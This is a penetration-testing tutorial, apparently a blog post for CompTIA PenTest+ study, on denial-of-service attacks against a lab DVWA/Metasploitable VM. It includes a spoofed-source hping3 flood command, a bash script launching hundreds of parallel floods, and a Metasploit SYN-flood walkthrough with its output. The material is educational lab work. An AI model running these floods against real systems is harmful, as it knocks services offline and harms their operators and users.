How to perform Denial of Service (DoS) Attack


CompTIA PenTest PT0-002

What is DoS Attack and why should you worry?

A Denial of Service (DoS) attack is a malicious effort to disrupt the functioning of something through an overwhelming amount of traffic.

Imagine being at a cafe with a friend, trying to have a conversation when all of a sudden, a group of people come in and start shouting. You can’t even hear each other, so you have no choice but to stop talking to your friend because the noise becomes too much. That’s what happens during DoS attacks.

They take advantage of network resource limits in order to exhaust bandwidth, CPU, and memory resources which make the service unavailable for legitimate users. The primary goal is to deny legitimate users access to the resource by interrupting or suspending services either temporarily or indefinitely.

The impact on businesses and individuals varies depending on the duration and intensity:

  • Downtime: This is the most immediate consequence that occurs. For businesses this means loss of revenue especially for e-commerce sites, online platforms, and services that rely on online transactions.
  • Financial Loss: Beyond just lost sales, businesses may incur additional costs related to mitigation efforts, increased cybersecurity measures, legal fees, and possibly paying ransoms if the DoS attack escalates into ransomware threats.
  • Damage to Reputation: Repeated attacks can damage your company's reputation leading to loss of trust among users and customers which has long term consequences on customer loyalty and brand perception.
  • Operational Disruption: DoS attacks can mess up everyday operations for both individuals and organizations by disrupting communication and access to critical online services.
  • Resource Diversion: Responding and recovering from these types of attacks can divert resources from other important projects affecting overall productivity.

 

DISCLAIMER:
This article is intended for educational purposes only. The tools and techniques discussed herein should be used in a legal, ethical manner, exclusively for security research or within authorized penetration testing activities. Unauthorized use of these tools against networks, systems, or applications without explicit permission can lead to legal consequences and ethical violations.

 

Performing DoS Attack Using hping3

We have Kali Linux which we will be our attack platform while we will perform the attack on DVWA which is a web application specifically designed to be vulnerable for educational purposes. We had already installed these VMs explained in a different article. Setup Lab Environment for CompTIA PenTest+ Exam (PT0-002)

Open a terminal on Kali Linux and perform a continuous ping towards your DVWA web server:

ping 10.10.1.12
How to perform Denial of Service (DoS) Attack

On a different terminal we will use hping3 to initiate a flood of request towards the target host. For example:

hping3 -S --flood --rand-source --icmp <TARGET IP>

hping3 Invokes the hping3 tool, used for crafting and sending custom TCP/IP packets.

  • -S: Specifies the TCP SYN flag, indicating a connection initiation.
  • --flood: Floods the target with packets at maximum speed.
  • --rand-source: Uses random source IP addresses for each packet, making the traffic harder to trace.
  • <TARGET IP>: Represents the IP address of the target to receive the flood of ICMP packets.

Now running a single instance of this command may not be sufficient to see any noticeable difference so we will create a shell script to send parallel request to our target host:

#!/bin/bash

# Usage: ./script.sh <target_ip> <number_of_executions>

TARGET_IP=$1
NUM_EXECUTIONS=$2

if [[ $# -lt 2 ]]; then
    echo "Usage: $0 <target_ip> <number_of_executions>"
    exit 1
fi

# Function to kill all child processes upon exit
function cleanup {
    echo "Killing all hping3 processes..."
    kill $(jobs -p)
    exit
}

# Trap SIGINT (Ctrl+C) and SIGTERM signals to execute the cleanup function
trap cleanup SIGINT SIGTERM

# Execute hping3 in parallel
for ((i=1; i<=NUM_EXECUTIONS; i++))
do
    hping3 -S --flood --rand-source --icmp  $TARGET_IP > /dev/null 2>&1 &
done

# Wait for all child processes to finish
wait

Let's run 300 instances of flood command over our target host:

bash trigger_flood.sh 10.10.1.12 300

and we can now see the impact of this command on the ping output:

How to perform Denial of Service (DoS) Attack

The increasing round trip time (RTT) for some packets, peaking at 1370 ms, could suggest that the target VM is under some level of stress, possibly from processing the incoming pings or other operations. We could also see events when there was no response at all from the target host.

The web browser is also not accessible any more:

How to perform Denial of Service (DoS) Attack

So you can understand the kind of impact such DoS attacks can bring as we didn't even target the explicit port number used by DVWA web server but just sending ICMP packets lead has brought down the web server,.

 

Performing DoS Attack Using Metasploit

We already covered how to use Metasploit to perform exploits un our previous article Exploit Vulnerabilities using Metasploit. We will again using metasploit to perform a DoS attack on our DVWA web server.

Open a terminal and start ping towards your target host. We will use this data to determine the impact of DoS attack by Metasploit:

ping 10.10.1.12

Open another terminal on your Kali Linux VM and launch the Metasploit console by typing msfconsole. Use the search command to find DoS-related modules

search dos tcp
How to perform Denial of Service (DoS) Attack

Once you find a suitable module, use the use command to select it. For example, use auxiliary/dos/tcp/synflood.

msf6 > use auxiliary/dos/tcp/synflood
msf6 auxiliary(dos/tcp/synflood) >

Use the show options command to view the required parameters for the selected module.

msf6 auxiliary(dos/tcp/synflood) > show options

Module options (auxiliary/dos/tcp/synflood):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   NUM                         no        Number of SYNs to send (else unlimited)
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port
   SHOST                       no        The spoofable source address (else randomizes)
   SNAPLEN    65535            yes       The number of bytes to capture
   SPORT                       no        The source port (else randomizes)
   TIMEOUT    500              yes       The number of seconds to wait for new data

Set the target IP address using the set RHOSTS command. You can also choose to setup other options based on your environment:

msf6 auxiliary(dos/tcp/synflood) > set RHOSTS 10.10.1.12
RHOSTS => 10.10.1.12

Once all options are configured, you can run the exploit

msf6 auxiliary(dos/tcp/synflood) > exploit
[*] Running module against 10.10.1.12

On a different terminal you can observe changes in the ping output. In our case we are observing packet drops at frequent time intervals when exploit was running. We can observe the packet loss after closing the ping command:

How to perform Denial of Service (DoS) Attack

The exploit initiates a SYN flood attack on the target system, Metasploitable. By flooding it with a massive number of SYN packets, the attacker aims to overload its network stack and resources. The resulting congestion leads to an inability to handle incoming connections, and causes packet loss—a state where genuine packets like ICMP Echo Requests (commonly used in ping tests) are discarded by the target. This high level of packet loss may result in disruption of network services and a significant percentage drop for such packages.

You can press Ctrl+C to stop the exploit execution:

[*] SYN flooding 10.10.1.12:80...
^C[-] Stopping running against current target...
[*] Control-C again to force quit all targets.
[*] Auxiliary module execution completed

 

Summary

This article is a complete look at Denial of Service (DoS) attacks. They are made to disrupt and render services useless to the people who should actually be using it. It provides insight into different types of DoS attacks, from volumetric, protocol, and application layer attacks. These each have their own unique traits, but all are very dangerous to businesses and individuals. Using Kali Linux, Metasploitable, and DVWA as examples we have tried to show how these things work in practice so you can see how important cybersecurity measures are in protecting them from these threats. The world we live in is becoming more interconnected every day which means there’s a lot more risk. Understanding DoS attacks will let companies bolster their defenses and safeguard against threats like this one.

 

Deepak Prasad

Deepak Prasad

He is the founder of GoLinuxCloud and brings over a decade of expertise in Linux, Python, Go, Laravel, DevOps, Kubernetes, Git, Shell scripting, OpenShift, AWS, Networking, and Security. With extensive experience, he excels in various domains, from development to DevOps, Networking, and Security, ensuring robust and efficient solutions for diverse projects. You can connect with him on his LinkedIn profile.

Can't find what you're searching for? Let us assist you.

Enter your query below, and we'll provide instant results tailored to your needs.

If my articles on GoLinuxCloud has helped you, kindly consider buying me a coffee as a token of appreciation.

Buy GoLinuxCloud a Coffee

For any other feedbacks or questions you can send mail to admin@golinuxcloud.com

Thank You for your support!!

Leave a Comment